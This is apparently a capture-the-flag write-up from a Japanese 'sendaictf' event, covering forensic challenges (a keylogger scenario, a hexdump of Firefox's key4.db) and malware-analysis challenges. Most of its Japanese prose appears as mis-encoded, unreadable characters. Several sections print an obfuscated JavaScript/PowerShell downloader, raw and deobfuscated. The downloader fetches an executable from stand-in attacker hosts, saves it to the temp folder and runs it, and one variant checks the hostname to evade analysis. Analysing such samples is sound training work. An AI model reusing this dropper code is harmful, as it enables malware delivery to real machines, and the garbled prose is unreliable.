ã«åå¨ãããã¹ã¦ã®ãã¡ã¤ã«ã«é¢ããå ´æãç©çä¸ã®ä½ç½®ãã¡ã¿ãã¼ã¿ï¼ä½ææ¥ãæ´æ°æ¥ãã¢ã¯ã»ã¹æ¥ãªã©ï¼ãä¿åããã¬ã³ã¼ããã¡ã¤ã«ã§ãããã ããã§ãã
ãã¦ãèªåå®è¡ããã¨ã«ãã«ã¦ã§ã¢Bãæ¢ãã(ãã¡ã¹ããã©ã¬ã³ã¸ãã¯ã®å®åã¨ã¯ï¼)ããã¨ã«RUNãã¼ãæ¢ãã«è¡ã£ãã
fakeã ããã§ãã
(ãã«ã¦ã§ã¢æ°¸ç¶åææ³)ã®ã¿ã¹ã¯ããã¼ã¸ã£ã¼ä»¥å¤ã¯è¦ã¦ã¿ãã
è²ã
è¦ã¦åã£ãããæªããã®ã¯fakemalwareã§ãããRegistry ViewerããRUNãã¼ãè¦ã¤ãã¦ããã¡ã¤ã«ãã¹ãå
¥åãæ£è§£ãfakeãããªããã ã
300
ææãã¦ãããã«ã¦ã§ã¢ã®æåã«ã¤ãã¦æ
å ±åéããã¨ããã以ä¸ã®ãããªãã¼ãã¬ã¼æ©è½ãæãã¦ãããã¨ãå¤æãã¾ããã
ï¼»ãã¼ãã¬ã¼æ©è½ã®åä½ï¼½
(1)å©ç¨è
ãå
¥åããããªã³ã©ã¤ã³ãã³ãã³ã°çã®ã¦ã¼ã¶ã¼IDã¨ãã¹ã¯ã¼ãããC:\Users\ãã¦ã¼ã¶ã¼åã\AppData\keylogger.txtãã«è¨é²ããã
(2)ãkeylogger.txtãã®å
容ããC2ãµã¼ãã«éä¿¡ããã
(3)ãkeylogger.txtãã®å
容ããï¼ãã¤ãã®æååã§ä¸æ¸ãä¿åãããã¨ã«ããæ¶å»ããã
ææãããã½ã³ã³ã確èªããã¨ãããkeylogger.txtããçºè¦ããããããä½ããã®ã¦ã¼ã¶ã¼IDã¨ãã¹ã¯ã¼ããæ
å ±æµåºããå¯è½æ§ãããã¨èãããã¾ããããªãã¯ãææãããã½ã³ã³ãã£ã¹ã¯ã¤ã¡ã¼ã¸ã解æããæ¶å»ããããã¼ã¿ï¼ï¼æ
å ±æµåºãããã¼ã¿ï¼ã®å¾©å
ã試ã¿ããã¨ã«ãã¾ããã
ææãããã½ã³ã³ã®æ¨¡æ¬ãã£ã¹ã¯ã¤ã¡ã¼ã¸ã解æããæ
å ±æµåºããããã¹ã¯ã¼ãããç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ãkeylogger.txtãã«è¨é²ããã¦ãããã¹ã¯ã¼ãã¨æãããæååï¼åè§ï¼
ä¾ï¼1qaz2wsx3edc
ï¼»åé¡ãã¡ã¤ã«ï¼½
forensic04.zip
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
3334CA6EB65D0D5758C2446AF2451FE3
ã¨ãããã¨ã§ããã¡ã¤ã«ã0byteã§ä¸æ¸ãããã¦ãããã復å
ãã¾ãããã¨ãããã¨ããããslackã¯ç¢ºèªããããªããããMFTãã確èªãã¦ã¿ãããã¯ã£ããã¨ã¯ããããªãã
$logfileããã©ããªãã¨ãèµ·ãã£ãã®ãææ¡ã34byteåã¯æ¸ããããããã®ãã¨0ã§æ¶ããã¦ãããä»æ¥ã¯ããã¾ã§ã300ç¹ã¯é£ããã
ã¾ããkeylogger.txtã¸ã®æ¸ãè¾¼ã¿ãè¡ãããåã®å®è¡ã確èªããã\user01\AppData\Roaming\Mozilla\Firefox\Profilesã¸ã®ã¢ã¯ã»ã¹ã確èªã§ããã(ãããã¡ã¤ã«)ãè¦ã¦ã¿ãã¨ãã¹ãªã©ãä¿åããã¦ããã¨ãããkey4.dbããã¹ã¯ã¼ããªã©ã«é¢ä¿ããããã ã(æ¨çåæ»æã§æ³¨ç®ãéãã Vega Stealer)ã§ãããããã«æ»æã®éã«key4.dbãlogins.jsonãååããããã ã
ââ# hexdump -v -C key4.db |grep password -9
0003ff10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
0003ff90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f |..............._|
0003ffa0 01 05 1d 34 81 08 70 61 73 73 77 6f 72 64 8e 00 |...4..password..|
0003ffb0 8b 2d 3e e2 87 29 24 ba a4 f0 70 8c df ac 9b 55 |.->..)$...p....U|
0003ffc0 d5 b5 30 3c 30 28 06 0b 2a 86 48 86 f7 0d 01 0c |..0<0(..*.H.....|
0003ffd0 05 01 03 30 19 04 14 70 f2 f1 a2 c7 b7 6b fb 62 |...0...p.....k.b|
0003ffe0 1b e5 ac d7 83 41 60 49 ed c4 44 02 01 01 04 10 |.....A`I..D.....|
0003fff0 98 93 b0 d3 07 d4 2c a0 3d ee 90 3a 3d f0 6f 24 |......,.=..:=.o$|
00040000 0a 00 00 00 01 7f f4 00 7f f4 00 00 00 00 00 00 |................|
00040010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00040020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00040030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
--
00047f60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047f70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047f80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047f90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047fa0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047fb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047fc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047fd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047fe0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00047ff0 00 00 00 00 0b 03 1d 09 70 61 73 73 77 6f 72 64 |........password|
ããã辺ã«é ãã¦ãããã ããæ¹éãééã£ã¦ãããããªæ°ããããããã
WriteUpè¦ã¦ã¿ãã(åé¡è§£èª¬ Forensic)æ·±ãèããããããã ã$MFTã«ã¯å°ãªãbyteã ã¨æ®ãããã ãã¾ããä¸æ¸ãã0byteã§ä¸æ¸ãâåé¤ããã ãã¨ãããã¨ã§æ®ã£ã¦ããããã ã
åç
ãã
ãFLAGã£ã½ãæåå以å¤ã ã¨flagãããããªããããããã³ãã«ãã¦ãã¾ã£ã¦ããã®ã¯ãããªããæ§é ããæ»ãããããã«ãªããã§ããfirefoxã«è©³ãããªããã®ã¯æªããªãã
100
ï¼»ã·ããªãªï¼½
æè¿ãæ¯æ¥ã®ããã«ãè¤æ°ã®ç¤¾å¡ãããä¸å¯©ã¡ã¼ã«ãå±ããã¨ã®éå ±ãããã¾ãã
æ¯åãåä¿¡è
ãã¨ã«ã¡ã¼ã«ã®å·®åºäººã件åãæ¬æãªã©ã¯ã©ã³ãã ã«è¨å®ããã¦ãã¾ããæ·»ä»ãã¡ã¤ã«åãã©ã³ãã ã«è¨å®ããã¦ãã¾ãããåä¿¡æ¥ãåãã§ããã°ããã¡ã¤ã«ã®å
容ï¼ããã·ã¥å¤ï¼ã¯åãã§ãããéå°ããã¨ä¸å¯©ãªéä¿¡ãçºçãã¾ãã
ãã¦ãæ¬æ¥ãä¸å¯©ã¡ã¼ã«ãå±ããã¨ã®éå ±ãããã¾ãããããªãã¯ãæ·»ä»ãã¡ã¤ã«ã解æããä¸å¯©éä¿¡å
ã確èªãããã¨ã¨ãã¾ããã
ï¼äºä¾ï¼ï¼
é£èªåãããJavascriptã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼ ä¾ï¼http://www.example.com/aaa.exe
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
1383BDA11883D924A444E2C391403156
ï¼»è£è¶³ï¼½
åé¡ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã¨ãã¦å¤å®ãããå¯è½æ§ãããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã®ããåä½ã¯ãããã¾ããã
åæã¯ãã¤ãã®ãã¤ã
ââ# file downloader2018_Lv1.js
downloader2018_Lv1.js: ASCII text, with very long lines (975), with CRLF line terminators
ââ# strings downloader2018_Lv1.js
var AbCdEfg = WScript.CreateObject("W4wt93qS4wt93qc4wt93qr4wt93qi4wt93qp4wt93qt4wt93q".replace(/4wt93q/g, "") + ".Sh" + "ell");
var paranum = 0;
codestr = "powershell.exe $cHPNC8 = 'XmqRLtY';$a = 'Msxml' + '2.XML' + 'HTTP';$D9Bkpiq = 'zwfnxFQn';$b = 'ADO' + 'DB.' + 'Stream';$ViXHtaa = 'afPaNR';$c = 'G' + 'E' + 'T';$y6Zs8i = 'y9Nhj';$d = 1 - 1 + 1;$arfRq = 'Zret8';$hr = New-Object -ComObject $a;$Xb9C3z = 'WipMlqo1';$ab = New-Object -ComObject $b;$OWNniyp3 = 'okFmlbcF';$path = $env:temp + '\797.exe';$MeDUZLzU = 'ViEEyiDt';$hr.open($c, 'h'+'Tt'+'p:' +'/' + '/'+ 'eAsYS'+ 'scr' + 'IPt.send'+ 'aictf-attacker.EXa'+'mpLE/1'+'00.e'+'xe', 0);$BkmnIhm = 'lMglhJCD';$hr.send();$OlUroA = 'ovwJO';$Zb3f7RVj2 = 'AyWGheD';$EUKnRQ = 'eq9G6';$jMjfuyL = 't9tGnMuT';$ab.open();$PaLGhJEr = 'Cf9lVfd';$ab.type = $d;$qiEHJ = 'NjQsbW3';$ab.write($hr.responseBody);$Gwtjxiu1 = 'Zm4B6l';$ab.savetofile($path);$LwzToi = 'XIEOnwD';$ab.close();$LSbathIv = 'yzxeScO';$JHAFYpTN = 'W1tBds';$LawOS = 'YTYyJd';$GVNSY2VL3 = 'QEXcEk';$aj8q2Pl = 'BFrEKTl';$B3Xz2p = 'YWgPSR2Y';$yGEJla7O = 'lWqvE';Start-Process $path;";
AbCdEfg.Run(codestr, paranum);
é£èªåããã¦ããæãã
var AbCdEfg = WScript.CreateObject("WScript.Shell");
var paranum = 0;
codestr =
"powershell.exe
$cHPNC8 = 'XmqRLtY';
$a = 'Msxml' + '2.XML' + 'HTTP';
$D9Bkpiq = 'zwfnxFQn';
$b = 'ADO' + 'DB.' + 'Stream';
$ViXHtaa = 'afPaNR';
$c = 'G' + 'E' + 'T';
$y6Zs8i = 'y9Nhj';
$d = 1 - 1 + 1;
$arfRq = 'Zret8';
$hr = New-Object -ComObject $a;
$Xb9C3z = 'WipMlqo1';
$ab = New-Object -ComObject $b;
$OWNniyp3 = 'okFmlbcF';
$path = $env:temp + '\797.exe';
$MeDUZLzU = 'ViEEyiDt';
$hr.open($c, 'h'+'Tt'+'p:' +'/' + '/'+ 'eAsYS'+ 'scr' + 'IPt.send'+ 'aictf-attacker.EXa'+'mpLE/1'+'00.e'+'xe', 0);$BkmnIhm = 'lMglhJCD';
$hr.send();
$OlUroA = 'ovwJO';
$Zb3f7RVj2 = 'AyWGheD';
$EUKnRQ = 'eq9G6';
$jMjfuyL = 't9tGnMuT';
$ab.open();
$PaLGhJEr = 'Cf9lVfd';
$ab.type = $d;
$qiEHJ = 'NjQsbW3';
$ab.write($hr.responseBody);
$Gwtjxiu1 = 'Zm4B6l';
$ab.savetofile($path);
$LwzToi = 'XIEOnwD';
$ab.close();
$LSbathIv = 'yzxeScO';
$JHAFYpTN = 'W1tBds';
$LawOS = 'YTYyJd';
$GVNSY2VL3 = 'QEXcEk';
$aj8q2Pl = 'BFrEKTl';
$B3Xz2p = 'YWgPSR2Y';
$yGEJla7O = 'lWqvE';
Start-Process $path;";
AbCdEfg.Run(codestr, paranum);
æ´å½¢ããã¨ãããªæããæå¾ã®AbCdEfg.Run(codestr, paranum);
ãããå®è¡ããã ãcodestrã«URLããããããä¸ããé ã«æ¸ãã¦ããã¨$hr.open($c, 'h'+'Tt'+'p:' +'/' + '/'+ 'eAsYS'+ 'scr' + 'IPt.send'+ 'aictf-attacker.EXa'+'mpLE/1'+'00.e'+'xe', 0);$BkmnIhm = 'lMglhJCD';
ããã®é¨åãURLãå«ãã§ããã解èªããã°flagã²ããã
Mal.2 æ¤ä½ï¼ ã¨ã¯ã»ã«ææ¸
100
ï¼äºä¾ï¼ï¼
ã¨ã¯ã»ã«ãã¯ãå½¢å¼ãã¦ã³ãã¼ãã¼ã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com/aaa.exe
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
A8003A0E4242C0800B52B6264E15F9F6
ï¼»è£è¶³ï¼½
åé¡ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã¨ãã¦å¤å®ãããå¯è½æ§ãããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã®ããåä½ã¯ãããã¾ããã
xlsãã¡ã¤ã«ã渡ããããåæè¡ãã¾ãã
ââ# file �+����4��_72436.xls
�+����4��_72436.xls: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 932, Last Saved By: Student, Name of Creating Application: Microsoft Excel, Last Printed: Fri Sep 30 14:56:13 2016, Create Time/Date: Wed Sep 28 11:10:05 2016, Last Saved Time/Date: Sat Oct 6 08:06:27 2018, Security: 0
stringsãããURLãã£ããçµäºã
Mal.3 æ¤ä½ï¼ ã¯ã¼ãææ¸
100
ï¼äºä¾ï¼ï¼
ç´°å·¥ãããã¯ã¼ãææ¸ã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ãã³ãï¼ãã®ã¯ã¼ãææ¸ã¯ãCVE-2017-0199ã®èå¼±æ§æ»æãæªç¨ããããã«ä½æããããã®ã®ããã§ãã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com/aaa.exe
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
7D3DA7A8B123960AD7DB7E0B82B478EE
ï¼»è£è¶³ï¼½
åé¡ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã¨ãã¦å¤å®ãããå¯è½æ§ãããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã®ããåä½ã¯ãããã¾ããã
ã¨ãããã¨ã§ãCVE-2017-0199ã«ã¤ãã¦èª¿ã¹ãã(Microsoft Office/WordPadã®èå¼±æ§CVE-2017-0199ãæ¤è¨¼ãã¦ã¿ãã)ã(Microsoft Office ããã³ã¯ã¼ããããã®èå¼±æ§ã«ãã)ãåèã«ãããã©ããã¸ã¢ã¯ã»ã¹ãããããã°ã©ã ãåãä»»æã®è¡åãã¨ããããããã ã
fileã³ãã³ããstringsã³ãã³ããæã£ã¦ã¿ããfileã³ãã³ãã¯ç¹ã«ãªããããstringsã¯æªããã®ãã©ããããããªãã
(èªå·±æµdocãã¯ã解æã®æé )ãè¦ã¦ã¿ãã¨ãã³ã¼ãããã¦ããå¯è½æ§ãããããã ãå¯è½æ§ã®ããæååãcyberchefã«æãã¦ãã£ããã{*\objclass htmlfile}{*\objdataã®æååã«URLããããã®ããã£ããå
¥åãæ£è§£ã
ç¥è(wod(objdata))
word(objdata)
(CVE-2018-8174)ã®ããã«ãããç¨ãã¦æ»æããæ¹æ³ãããããã ã
Mal.4 æ¤ä½ï¼ JavaScript2
300
ï¼äºä¾ï¼ï¼
é£èªåãããJavascriptã解æããéä¿¡å
ãç¹å®ãã¦ãã ããã
ãªãããã®ãã«ã¦ã§ã¢ã¯ããã½ã³ã³ã®åä½ç°å¢ããã§ãã¯ããããæ¡ä»¶ãæºãããå ´åã«ã®ã¿åä½ããããã§ãã
ï¼»ãã©ã°ï¼½
ä¸å¯©éä¿¡å
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com/aaa.exe
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
9B5B4D0DE109C8CF60DDA8B3C48163C9
ï¼»è£è¶³ï¼½
åé¡ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã¨ãã¦å¤å®ãããå¯è½æ§ãããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã®ããåä½ã¯ãããã¾ããã
ã¨ãããã¨ã§ã解æãã¦ãããghidraãç¨ãã¦ããæãããã
ââ# file downloader2018_LvX.js
downloader2018_LvX.js: ASCII text, with very long lines (6796), with CRLF line terminators
ââ# strings downloader2018_LvX.js
G17vle = "aitunogetanootogasitanndaaikkdikdigokgasitandaoikositaradarekanokagebokaitunogekotogasishitankdausironiiruaituhadaregdarokugfurimudekinayomiienaitikamietaoomobebakesaniymimfuekfdikaodkdaaitunogetanootogasitandaaitunodekdkeikdjgkaiekjkshitanntakdishitaradarekanokagebousiaitunogekdaiekdgidakeigakdishitanndakaronnkoronnkaronkoronkarikgaoaridkgaodiadkgeikdakd";Gl7vle = String.fromCharCode(112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,105,102,40,91,78,101,116,46,68,110,115,93,58,58,71,101,116,72,111,115,116,78,97,109,101,40,41,32,45,110,101,32,39,115,101,110,100,97,105,99,116,102,45,112,99,48,49,39,41,123,69,120,105,116,125,59,32,36,99,72,80,78,67,56,32,61,32,39,88,109,113,82,76,116,89,39,59,36,97,32,61,32,39,77,115,120,109,108,39,32,43,32,39,50,46,88,77,76,39,32,43,32,39,72,84,84,80,39,59,36,68,57,66,107,112,105,113,32,61,32,39,122,119,102,110,120,70,81,110,39,59,36,98,32,61,32,39,65,68,79,39,32,43,32,39,68,66,46,39,32,43,32,39,83,116,114,101,97,109,39,59,36,86,105,88,72,116,97,97,32,61,32,39,97,102,80,97,78,82,39,59,36,99,32,61,32,39,71,39,32,43,32,39,69,39,32,43,32,39,84,39,59,36,121,54,90,115,56,105,32,61,32,39,121,57,78,104,106,39,59,36,100,32,61,32,49,32,45,32,49,32,43,32,49,59,36,97,114,102,82,113,32,61,32,39,90,114,101,116,56,39,59,36,104,114,32,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,79,98,106,101,99,116,32,36,97,59,36,88,98,57,67,51,122,32,61,32,39,87,105,112,77,108,113,111,49,39,59,36,97,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,79,98,106,101,99,116,32,36,98,59,36,79,87,78,110,105,121,112,51,32,61,32,39,111,107,70,109,108,98,99,70,39,59,36,112,97,116,104,32,61,32,36,101,110,118,58,116,101,109,112,32,43,32,39,7,57,55,46,101,120,101,39,59,36,77,101,68,85,90,76,122,85,32,61,32,39,86,105,69,69,121,105,68,116,39,59,36,104,114,46,111,112,101,110,40,36,99,44,32,39,104,116,116,112,58,47,47,116,104,105,115,46,105,115,95,110,111,116,46,97,46,102,108,97,103,47,84,114,121,65,103,97,105,110,39,44,32,48,41,59,36,66,107,109,110,73,104,109,32,61,32,39,108,77,103,108,104,74,67,68,39,59,36,104,114,46,115,101,110,100,40,41,59,36,79,108,85,114,111,65,32,61,32,39,111,118,119,74,79,39,59,36,90,98,51,102,55,82,86,106,50,32,61,32,39,65,121,87,71,104,101,68,39,59,36,69,85,75,110,82,81,32,61,32,39,101,113,57,71,54,39,59,36,106,77,106,102,117,121,76,32,61,32,39,116,57,116,71,110,77,117,84,39,59,36,97,98,46,111,112,101,110,40,41,59,36,80,97,76,71,104,74,69,114,32,61,32,39,67,102,57,108,86,102,100,39,59,36,97,98,46,116,121,112,101,32,61,32,36,100,59,36,113,105,69,72,74,32,61,32,39,78,106,81,115,98,87,51,39,59,36,97,98,46,119,114,105,116,101,40,36,104,114,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,36,71,119,116,106,120,105,117,49,32,61,32,39,90,109,52,66,54,108,39,59,36,97,98,46,115,97,118,101,116,111,102,105,108,101,40,36,112,97,116,104,41,59,36,76,119,122,84,111,105,32,61,32,39,88,73,69,79,110,119,68,39,59,36,97,98,46,99,108,111,115,101,40,41,59,36,76,83,98,97,116,104,73,118,32,61,32,39,121,122,120,101,83,99,79,39,59,36,74,72,65,70,89,112,84,78,32,61,32,39,87,49,116,66,100,115,39,59,36,76,97,119,79,83,32,61,32,39,89,84,89,121,74,100,39,59,36,71,86,78,83,89,50,86,76,51,32,61,32,39,81,69,88,99,69,107,39,59,36,97,106,56,113,50,80,108,32,61,32,39,66,70,114,69,75,84,108,39,59,36,66,51,88,122,50,112,32,61,32,39,89,87,103,80,83,82,50,89,39,59,36,121,71,69,74,108,97,55,79,32,61,32,39,108,87,113,118,69,39,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,112,97,116,104,59);Gl7vle = String.fromCharCode(112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,105,102,40,91,78,101,116,46,68,110,115,93,58,58,71,101,116,72,111,115,116,78,97,109,101,40,41,32,45,110,101,32,39,115,101,110,100,97,105,99,116,102,45,112,99,48,49,39,41,123,69,120,105,116,125,59,32,36,99,72,80,78,67,56,32,61,32,39,88,109,113,82,76,116,89,39,59,36,97,32,61,32,39,77,115,120,109,108,39,32,43,32,39,50,46,88,77,76,39,32,43,32,39,72,84,84,80,39,59,36,68,57,66,107,112,105,113,32,61,32,39,122,119,102,110,120,70,81,110,39,59,36,98,32,61,32,39,65,68,79,39,32,43,32,39,68,66,46,39,32,43,32,39,83,116,114,101,97,109,39,59,36,86,105,88,72,116,97,97,32,61,32,39,97,102,80,97,78,82,39,59,36,99,32,61,32,39,71,39,32,43,32,39,69,39,32,43,32,39,84,39,59,36,121,54,90,115,56,105,32,61,32,39,121,57,78,104,106,39,59,36,100,32,61,32,49,32,45,32,49,32,43,32,49,59,36,97,114,102,82,113,32,61,32,39,90,114,101,116,56,39,59,36,104,114,32,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,79,98,106,101,99,116,32,36,97,59,36,88,98,57,67,51,122,32,61,32,39,87,105,112,77,108,113,111,49,39,59,36,97,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,79,98,106,101,99,116,32,36,98,59,36,79,87,78,110,105,121,112,51,32,61,32,39,111,107,70,109,108,98,99,70,39,59,36,112,97,116,104,32,61,32,36,101,110,118,58,116,101,109,112,32,43,32,39,7,57,55,46,101,120,101,39,59,36,77,101,68,85,90,76,122,85,32,61,32,39,86,105,69,69,121,105,68,116,39,59,36,104,114,46,111,112,101,110,40,36,99,44,32,39,104,116,116,112,58,47,47,102,106,46,115,101,110,100,97,105,99,116,102,45,97,116,116,97,99,107,101,114,46,99,111,109,47,50,48,48,46,98,105,110,39,44,32,48,41,59,36,66,107,109,110,73,104,109,32,61,32,39,108,77,103,108,104,74,67,68,39,59,36,104,114,46,115,101,110,100,40,41,59,36,79,108,85,114,111,65,32,61,32,39,111,118,119,74,79,39,59,36,90,98,51,102,55,82,86,106,50,32,61,32,39,65,121,87,71,104,101,68,39,59,36,69,85,75,110,82,81,32,61,32,39,101,113,57,71,54,39,59,36,106,77,106,102,117,121,76,32,61,32,39,116,57,116,71,110,77,117,84,39,59,36,97,98,46,111,112,101,110,40,41,59,36,80,97,76,71,104,74,69,114,32,61,32,39,67,102,57,108,86,102,100,39,59,36,97,98,46,116,121,112,101,32,61,32,36,100,59,36,113,105,69,72,74,32,61,32,39,78,106,81,115,98,87,51,39,59,36,97,98,46,119,114,105,116,101,40,36,104,114,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,36,71,119,116,106,120,105,117,49,32,61,32,39,90,109,52,66,54,108,39,59,36,97,98,46,115,97,118,101,116,111,102,105,108,101,40,36,112,97,116,104,41,59,36,76,119,122,84,111,105,32,61,32,39,88,73,69,79,110,119,68,39,59,36,97,98,46,99,108,111,115,101,40,41,59,36,76,83,98,97,116,104,73,118,32,61,32,39,121,122,120,101,83,99,79,39,59,36,74,72,65,70,89,112,84,78,32,61,32,39,87,49,116,66,100,115,39,59,36,76,97,119,79,83,32,61,32,39,89,84,89,121,74,100,39,59,36,71,86,78,83,89,50,86,76,51,32,61,32,39,81,69,88,99,69,107,39,59,36,97,106,56,113,50,80,108,32,61,32,39,66,70,114,69,75,84,108,39,59,36,66,51,88,122,50,112,32,61,32,39,89,87,103,80,83,82,50,89,39,59,36,121,71,69,74,108,97,55,79,32,61,32,39,108,87,113,118,69,39,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,112,97,116,104,59);var JdECvqCzY = WScript.CreateObject("W4wt93qS4wt93qc4wt93qr4wt93qi4wt93qp4wt93qt4wt93q".replace(/4wt93q/g, "") + ".Sh" + "ell");var RZK2EK = 0;JdECvqCzY.Run(Gl7vle, RZK2EK);
ã¨ãããã¨ã§ãããªããªé£èªåããã¦ããæããä½åãGl7vleã«ä»£å
¥ãã¦ããã®ã§ã
Gl7vleã®ä¸ã®æååãcyberchefã«æãããã¾ãä½ãããåºã¦ããããããæå½¢ããã¨ã
powershell.exe if([Net.Dns]::GetHostName() -ne 'sendaictf-pc01'){Exit};
$cHPNC8 = 'XmqRLtY';
$a = 'Msxml' + '2.XML' + 'HTTP';
$D9Bkpiq = 'zwfnxFQn';
$b = 'ADO' + 'DB.' + 'Stream';
$ViXHtaa = 'afPaNR';
$c = 'G' + 'E' + 'T';
$y6Zs8i = 'y9Nhj';
$d = 1 - 1 + 1;
$arfRq = 'Zret8';
$hr = New-Object -ComObject $a;
$Xb9C3z = 'WipMlqo1';
$ab = New-Object -ComObject $b;
$OWNniyp3 = 'okFmlbcF';
$path = $env:temp + ' 97.exe';
$MeDUZLzU = 'ViEEyiDt';
$hr.open($c, 'http://fj.sendaictf-attacker.com/200.bin', 0);
$BkmnIhm = 'lMglhJCD';
$hr.send();
$OlUroA = 'ovwJO';
$Zb3f7RVj2 = 'AyWGheD';
$EUKnRQ = 'eq9G6';
$jMjfuyL = 't9tGnMuT';
$ab.open();
$PaLGhJEr = 'Cf9lVfd';
$ab.type = $d;
$qiEHJ = 'NjQsbW3';
$ab.write($hr.responseBody);
$Gwtjxiu1 = 'Zm4B6l';
$ab.savetofile($path);
$LwzToi = 'XIEOnwD';
$ab.close();
$LSbathIv = 'yzxeScO';
$JHAFYpTN = 'W1tBds';
$LawOS = 'YTYyJd';
$GVNSY2VL3 = 'QEXcEk';
$aj8q2Pl = 'BFrEKTl';
$B3Xz2p = 'YWgPSR2Y';
$yGEJla7O = 'lWqvE';
Start-Process $path;
ã¨ãªã£ãããªããURLãåºã¦ããã®ã§ããããå
¥åããã¨æ£è§£ã ã£ãã
Lab.1 ä¸å¯©ãã¡ã¤ã«ã®èµ·åæ¥æ
100
ï¼»ã·ããªãªï¼½
ããæ¥ãå¶æ¥æã®ç¤¾å¡ç¨ãã½ã³ã³ã®ã¦ã¤ã«ã¹å¯¾çã½ãããããã¦ã¤ã«ã¹æ¤ç¥ã¢ã©ã¼ããéç¥ããã¾ããã
社å¡ã«é»è©±é£çµ¡ãç¶æ³ã確èªããã¨ããããã°ããå©ç¨ãã¦ããªãã£ã社å¡ç¨ãã½ã³ã³ãä¹
ãã¶ãã«èµ·åããææ°ãã¿ã¼ã³ãã¡ã¤ã«ã«æ´æ°ã®ããæåã§ãªã³ããã³ãã¹ãã£ã³ãå®è¡ããã¨ãããããã¹ã¯ãããã«ä½æããã¦ãã身ã«è¦ãã®ãªããã¡ã¤ã«ããããã«ã¦ã§ã¢ã¨ãã¦æ¤ç¥ããããã§ãã
ããªãã¯ãæ¤ç¥ãããã¡ã¤ã«ï¼æ¤ä½ï¼ã¯ãéå»ã®ãã¤ãã®æç¹ã§ææãã¦ãããã«ã¦ã§ã¢ã§ããå¯è½æ§ãé«ãã¨èãã社å¡ç¨ãã½ã³ã³ãã調æ»ã«å¿
è¦ã¨ãªãã¨ããã³ã¹ã証æ ä¿å
¨ããææåå ã調æ»ãããã¨ã¨ãã¾ããã
æ¤ä½ãä½æããã³èµ·åãããæ¥æãç¹å®ãã¦ãã ããã
ï¼»æ¤ç¥ãããã¡ã¤ã«ï¼½
ãã©ã«ãåï¼C:\Users\user01\Desktop\
ãã¡ã¤ã«åï¼1.exe
è
å¨åããï¼BKDR_POISON.DS
æ¤æ»ã®ç¨®é¡ï¼ãªã³ããã³ãã¹ãã£ã³
å¦ççµæãï¼ç¡è¦
ï¼»ãã©ã°ï¼½
æ¤ä½ã1.exeããä½æããã³èµ·åãããæ¥æ
ï¼YYYY/MM/DD-hh:mmï¼ï¼åè§ï¼
ä¾ï¼2018/11/10-23:59
ï¼»åé¡ãã¡ã¤ã«ï¼½
lab01.zip
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
C2D60778DE629699115E109DB14DB33F
